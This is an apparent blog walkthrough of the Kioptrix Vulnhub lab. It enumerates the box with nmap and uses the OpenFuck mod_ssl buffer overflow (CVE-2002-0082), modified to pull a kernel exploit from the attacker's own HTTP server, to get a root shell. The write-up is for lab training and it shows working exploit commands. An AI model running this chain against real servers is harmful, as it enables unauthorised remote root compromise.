Vulnhub virtual machine; On the path to OSCP this box offered Apache/OpenSSL vulnerability which led to a custom version of the exploit and an environmental problem and solution.

Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.

Initial setup:

This boot-2-root box is on the legacy side of things and there are a few things that need to be accomplished before you are able to boot this image (virtual box)

add Kioptix vmdk harddrive to storage as IDE (this box does NOT like SATA - will kernel panic)

disable audio

change network adapter to PCnet-PCI II (AM79C970A) && Attached to Adapter

disable usb

With this configuration you should be able to properly boot the box.

Enumeration

Searching for target:

1	`netdiscover -r 192.168.56.0/24`

target looks to be 192.168.56.103

Perform NMAP scan:

1	`nmap -sC -sV -oA nmap/kio1 192.168.56.103`

interesting to note that we have quite a few ports to examine.

Since this is an older box lets search for any open vulnerabilites pertaining to the Apache and its mod_ssl 2.8.4 OpenSSL.

searchsploit

1	`searchsploit mod_ssl`

interesting candidate: Apache mod_ssl < 2.8.7 OpenSSL - ‘OpenFuckV2.c’ Remote Buffer Overflow

Based off the CVE: 2002-0082 There is a vulnerability pertaining to session cache code that fails to initialize memory using a special function that allows for a buffer overflow to execute arbitrary code.

source: https://nvd.nist.gov/vuln/detail/CVE-2002-0082

Exploit

Copy the exploit locally:

1	`searchsploit -m exploits/unix/remote/764.c`

view source:

search for any random shell code and/if replace if needed.

compile source code:

1	`gcc -o exploit 764.c -lcrypto`

looks to be missing some dependencies.

correction: above exploit requires updating and can be correctly found at this repository.

1	`git clone https://github.com/heltonWernik/OpenFuck.git`

download the ptrace-kmod.c && start python SimpleHTTPServer in directory of file.

edit the external link at line 671

install dependencies:

1	`apt-get install libssl-dev`

compile:

1	`gcc -o OpenFuck OpenFuck.c -lcrypto`

Run exploit:

1	`./OpenFuck`

Search for which service you are attempting to exploit. Use the following syntax to continue.

1	`./OpenFuck 0x6b \[Target Ip\] [port] -c 40`

Running exploit against box:

1	`./OpenFuck 0x6a 192.168.56.103 443 -c 50`

hung awaiting the race condition of the exploit. Good to see the exploit be pulled from the SimpleHTTPServer.

Root - Plot Shift

change of plans: Reverted back to website which I know it wont be able to be reached. At that point I performed the steps manually to change the term and get a bash shell.

1	`TERM=xterm; export TERM=xterm; exec bash -i`

bring me the root!